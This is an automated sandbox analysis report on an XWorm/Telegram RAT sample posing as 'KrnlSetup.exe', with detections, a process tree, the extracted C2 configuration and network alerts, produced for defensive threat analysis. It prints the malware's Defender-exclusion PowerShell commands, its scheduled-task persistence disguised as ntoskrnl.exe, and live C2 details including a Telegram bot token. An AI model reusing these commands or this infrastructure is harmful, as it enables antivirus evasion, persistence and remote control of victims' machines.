Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KrnlSetup.exe

Overview

General Information

Sample name:KrnlSetup.exe
Analysis ID:1572248
MD5:493ac3e54bae1f0d5a31b68348352f6c
SHA1:170c49a1115624e8fc5cafe7c33f76e54cf31c7a
SHA256:c89625e4304d4708308a8a4138af28b90d490e8bd29ccdf3bc1f567d9644a7d7
Tags:exeuser-lontze7
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • KrnlSetup.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\KrnlSetup.exe" MD5: 493AC3E54BAE1F0D5A31B68348352F6C)
    • powershell.exe (PID: 3848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5804 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2228 cmdline: "C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5236 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 2284 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • ntoskrnl.exe (PID: 5428 cmdline: C:\ProgramData\ntoskrnl.exe MD5: 493AC3E54BAE1F0D5A31B68348352F6C)
  • ntoskrnl.exe (PID: 652 cmdline: "C:\ProgramData\ntoskrnl.exe" MD5: 493AC3E54BAE1F0D5A31B68348352F6C)
  • ntoskrnl.exe (PID: 2328 cmdline: "C:\ProgramData\ntoskrnl.exe" MD5: 493AC3E54BAE1F0D5A31B68348352F6C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["https://pastebin.com/raw/5FinF5Mf"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "drivers.exe", "Version": "XWorm V5.2"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
KrnlSetup.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    KrnlSetup.exeJoeSecurity_XWormYara detected XWormJoe Security
      KrnlSetup.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        KrnlSetup.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          KrnlSetup.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x10970:$s6: VirtualBox
          • 0x108ce:$s8: Win32_ComputerSystem
          • 0x132b2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x1334f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x13464:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x11d8c:$cnc4: POST / HTTP/1.1

          PCAP (Network Traffic)

          SourceRuleDescriptionAuthorStrings
          sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

            Dropped Files

            SourceRuleDescriptionAuthorStrings
            C:\ProgramData\ntoskrnl.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
              C:\ProgramData\ntoskrnl.exeJoeSecurity_XWormYara detected XWormJoe Security
                C:\ProgramData\ntoskrnl.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  C:\ProgramData\ntoskrnl.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    C:\ProgramData\ntoskrnl.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x10970:$s6: VirtualBox
                    • 0x108ce:$s8: Win32_ComputerSystem
                    • 0x132b2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x1334f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x13464:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x11d8c:$cnc4: POST / HTTP/1.1

                    Memory Dumps

                    SourceRuleDescriptionAuthorStrings
                    00000000.00000002.2614356137.00000000025EB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                      00000000.00000002.2614356137.0000000002597000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                        00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                          00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                            00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                            • 0x143e8:$s6: VirtualBox
                            • 0x14346:$s8: Win32_ComputerSystem
                            • 0x16d2a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                            • 0x16dc7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                            • 0x16edc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                            • 0x15804:$cnc4: POST / HTTP/1.1
                            Click to see the 8 entries

                            Unpacked PEs

                            SourceRuleDescriptionAuthorStrings
                            0.2.KrnlSetup.exe.25ee020.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                              0.0.KrnlSetup.exe.1c0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                                0.0.KrnlSetup.exe.1c0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                                  0.0.KrnlSetup.exe.1c0000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                                    0.0.KrnlSetup.exe.1c0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                                    • 0x10970:$s6: VirtualBox
                                    • 0x108ce:$s8: Win32_ComputerSystem
                                    • 0x132b2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                                    • 0x1334f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                                    • 0x13464:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                                    • 0x11d8c:$cnc4: POST / HTTP/1.1

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KrnlSetup.exe", ParentImage: C:\Users\user\Desktop\KrnlSetup.exe, ParentProcessId: 7120, ParentProcessName: KrnlSetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', ProcessId: 3848, ProcessName: powershell.exe
                                    Sigma detected: System File Execution Location Anomaly
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\ProgramData\ntoskrnl.exe, CommandLine: C:\ProgramData\ntoskrnl.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\ntoskrnl.exe, NewProcessName: C:\ProgramData\ntoskrnl.exe, OriginalFileName: C:\ProgramData\ntoskrnl.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\ProgramData\ntoskrnl.exe, ProcessId: 5428, ProcessName: ntoskrnl.exe
                                    Sigma detected: Change PowerShell Policies to an Insecure Level
                                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KrnlSetup.exe", ParentImage: C:\Users\user\Desktop\KrnlSetup.exe, ParentProcessId: 7120, ParentProcessName: KrnlSetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', ProcessId: 3848, ProcessName: powershell.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\ntoskrnl.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KrnlSetup.exe, ProcessId: 7120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntoskrnl
                                    Sigma detected: Powershell Defender Exclusion
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KrnlSetup.exe", ParentImage: C:\Users\user\Desktop\KrnlSetup.exe, ParentProcessId: 7120, ParentProcessName: KrnlSetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', ProcessId: 3848, ProcessName: powershell.exe
                                    Sigma detected: Startup Folder File Write
                                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\KrnlSetup.exe, ProcessId: 7120, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KrnlSetup.exe", ParentImage: C:\Users\user\Desktop\KrnlSetup.exe, ParentProcessId: 7120, ParentProcessName: KrnlSetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe', ProcessId: 3848, ProcessName: powershell.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-10T10:05:01.393762+010028536851A Network Trojan was detected192.168.2.449745149.154.167.220443TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-10T10:05:14.455517+010028528701Malware Command and Control Activity Detected115.69.183.22237593192.168.2.449751TCP
                                    2024-12-10T10:05:22.882125+010028528701Malware Command and Control Activity Detected115.69.183.22237593192.168.2.449751TCP
                                    2024-12-10T10:05:26.747572+010028528701Malware Command and Control Activity Detected115.69.183.22237593192.168.2.449751TCP
                                    2024-12-10T10:05:29.838493+010028528701Malware Command and Control Activity Detected115.69.183.22237593192.168.2.449751TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-10T10:05:14.479696+010028529231Malware Command and Control Activity Detected192.168.2.449751115.69.183.22237593TCP
                                    2024-12-10T10:05:20.388438+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:20.508839+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:20.629374+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:20.748806+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:20.868343+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:20.988429+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.109747+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.229755+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.349751+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.469250+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.588749+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.709750+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.829229+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.917850+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.148168+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.269031+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.388499+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.507997+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.617874+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.746512+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.865936+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.105359+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.208331+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.328595+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.448019+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.567924+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.687430+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.802604+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.922164+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.045611+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.165329+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.284666+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.399411+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.530557+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.659984+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.779401+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.898961+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.018450+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.137856+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.359880+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.479548+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.601845+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.721165+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.842004+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.929310+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:26.049097+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:26.169325+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:26.288740+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:26.527682+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:26.647074+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:26.758670+010028529231Malware Command and Control Activity Detected192.168.2.449751115.69.183.22237593TCP
                                    2024-12-10T10:05:26.876964+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.011248+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.146818+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.269718+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.390329+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.596782+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.862581+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.982094+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:28.142483+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:28.261891+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:28.382436+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:28.624004+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:28.789710+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:28.911765+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.031215+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.152823+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.257744+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.273973+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.393724+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.513756+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.633791+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.753195+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.899277+010028529231Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-10T10:05:22.882125+010028528741Malware Command and Control Activity Detected115.69.183.22237593192.168.2.449751TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-10T10:05:20.388438+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:20.508839+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:20.629374+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:20.748806+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:20.868343+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:20.988429+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.109747+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.229755+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.349751+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.469250+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.588749+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
